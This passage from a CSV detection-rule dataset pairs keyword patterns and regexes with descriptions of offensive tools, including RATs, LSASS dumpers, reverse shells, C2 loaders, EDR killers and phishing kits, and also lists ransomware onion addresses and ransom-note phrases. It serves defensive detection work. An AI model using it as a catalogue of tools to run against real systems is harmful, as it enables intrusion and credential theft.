TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","63318" "*xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion*",".{0,1000}xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63319" "*XWorm_RAT_V2._1.data.*",".{0,1000}XWorm_RAT_V2\._1\.data\..{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - 
TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","63321" "*XWorm-v5-Remote-Access-Tool*",".{0,1000}XWorm\-v5\-Remote\-Access\-Tool.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","N/A","10","","N/A","","","","63322" "*XXEinjector*",".{0,1000}XXEinjector.{0,1000}","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Vulnerability Scanner","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","10","1619","319","2024-12-01T15:25:27Z","2015-05-16T10:56:14Z","63324" "*xxePayloads.ini*",".{0,1000}xxePayloads\.ini.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","63325" "*XX-PHISHING-LINK-XX*",".{0,1000}XX\-PHISHING\-LINK\-XX.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","63326" "*X-YSOSERIAL-NET*",".{0,1000}X\-YSOSERIAL\-NET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63327" "*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*",".{0,1000}xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","63328" "*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*",".{0,1000}xzfbmR6MskR8J6Zr58RrhMc325kejLJE.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","63329" "*Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=*",".{0,1000}Y21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA\=.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation 
Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#base64","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","63330" "*Y29iYWx0c3RyaWtl*",".{0,1000}Y29iYWx0c3RyaWtl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63331" "*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*",".{0,1000}Y2F0Y2hldHVtYm90aWZ5b3VjYW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration 
simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63332" "*yanncam/ShuckNT*",".{0,1000}yanncam\/ShuckNT.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","63337" "*YaraFilters*lsassdump.yar*",".{0,1000}YaraFilters.{0,1000}lsassdump\.yar.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63338" "*yarrick/iodine*",".{0,1000}yarrick\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","63341" "*yasserbdj96/hiphp*",".{0,1000}yasserbdj96\/hiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","63342" "*yasserjanah/CVE-2020-5902*",".{0,1000}yasserjanah\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","N/A","1","43","15","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z","63343" "*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*",".{0,1000}YaWNdpwplLwycqWQDCyruhAFsYjWjnBA.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","63344" "*Yaxser/Backstab*",".{0,1000}Yaxser\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","63345" "*Yay! 
No SYSMON here!*",".{0,1000}Yay!\sNo\sSYSMON\shere!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","#content","N/A","N/A","1","88","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z","63346" "*yck1509/ConfuserEx*",".{0,1000}yck1509\/ConfuserEx.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","63347" "*YDHCUI/csload.net*",".{0,1000}YDHCUI\/csload\.net.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","63348" "*YDHCUI/manjusaka*",".{0,1000}YDHCUI\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","63349" "*yeelight_discover.py*",".{0,1000}yeelight_discover\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","63350" "*yehia-mamdouh/Lsassx*",".{0,1000}yehia\-mamdouh\/Lsassx.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63351" "*yehia-mamdouh/Shell3er*",".{0,1000}yehia\-mamdouh\/Shell3er.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","63352" "*yehia-mamdouh/var0xshell*",".{0,1000}yehia\-mamdouh\/var0xshell.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","63353" "*yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion*",".{0,1000}yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63354" "*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*",".{0,1000}Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","63355" "*yisier/nps*",".{0,1000}yisier\/nps.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","1","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","63356" "*Yml0c3kubWl0LmVkdQ==*",".{0,1000}Yml0c3kubWl0LmVkdQ\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be 
used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63360" "*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*",".{0,1000}YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63361" "*YmxvY2s9MTAw*",".{0,1000}YmxvY2s9MTAw.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63362" "*yogeshojha/rengine*",".{0,1000}yogeshojha\/rengine.{0,1000}","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. reNgine makes it easy for penetration testers to gather reconnaissance with","T1595.003 - T1590.002 - T1083 - T1071","TA0007 - TA0005 - TA0043","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","N/A","10","7866","1195","2025-02-24T01:03:27Z","2020-05-03T12:13:12Z","63363" "*yolAbejyiejuvnup=Evjtgvsh5okmkAvj*",".{0,1000}yolAbejyiejuvnup\=Evjtgvsh5okmkAvj.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","10","10","N/A","N/A","N/A","N/A","63364" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","63365" "*You are trying to target a 
User Group Policy Object while running the embedded SMB server*",".{0,1000}You\sare\strying\sto\starget\sa\sUser\sGroup\sPolicy\sObject\swhile\srunning\sthe\sembedded\sSMB\sserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","63366" "*You can execute commands in this shell :D*",".{0,1000}You\scan\sexecute\scommands\sin\sthis\sshell\s\:D.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","63367" "*you cannot run the RogueOxidResolver on 127.0.0.1*",".{0,1000}you\scannot\srun\sthe\sRogueOxidResolver\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","63368" "*You can't CD under SMBEXEC. 
Use full paths*",".{0,1000}You\scan\'t\sCD\sunder\sSMBEXEC\.\sUse\sfull\spaths.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","63369" "*You do not have sufficient permission to hide the scheduled task*",".{0,1000}You\sdo\snot\shave\ssufficient\spermission\sto\shide\sthe\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","63370" "*You finally broke through BlankOBF v2; Give yourself a pat on your back!*",".{0,1000}You\sfinally\sbroke\sthrough\sBlankOBF\sv2\;\sGive\syourself\sa\spat\son\syour\sback!.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","63371" "*You have been hack By Shany with Love To #worst*",".{0,1000}You\shave\sbeen\shack\sBy\sShany\swith\sLove\sTo\s\#worst.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63372" "*YOU HAVE to CONTACT US using TOR LIVE CHAT*",".{0,1000}YOU\sHAVE\sto\sCONTACT\sUS\susing\sTOR\sLIVE\sCHAT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection 
patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63373" "*You managed to break through BlankOBF v2; Give yourself a pat on your back!*",".{0,1000}You\smanaged\sto\sbreak\sthrough\sBlankOBF\sv2\;\sGive\syourself\sa\spat\son\syour\sback!.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","63374" "*You need to be in high integrity to extract LSA secrets!*",".{0,1000}You\sneed\sto\sbe\sin\shigh\sintegrity\sto\sextract\sLSA\ssecrets!.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","63376" "*You need to contact us on TOR darknet sites with your personal ID*",".{0,1000}You\sneed\sto\scontact\sus\son\sTOR\sdarknet\ssites\swith\syour\spersonal\sID.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63377" "*you need to provide the path to directory where your phishlets are 
stored:*",".{0,1000}you\sneed\sto\sprovide\sthe\spath\sto\sdirectory\swhere\syour\sphishlets\sare\sstored\:.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","63378" "*You_spin_me__round.ino*",".{0,1000}You_spin_me__round\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","63379" "*youcantpatchthis*",".{0,1000}youcantpatchthis.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - 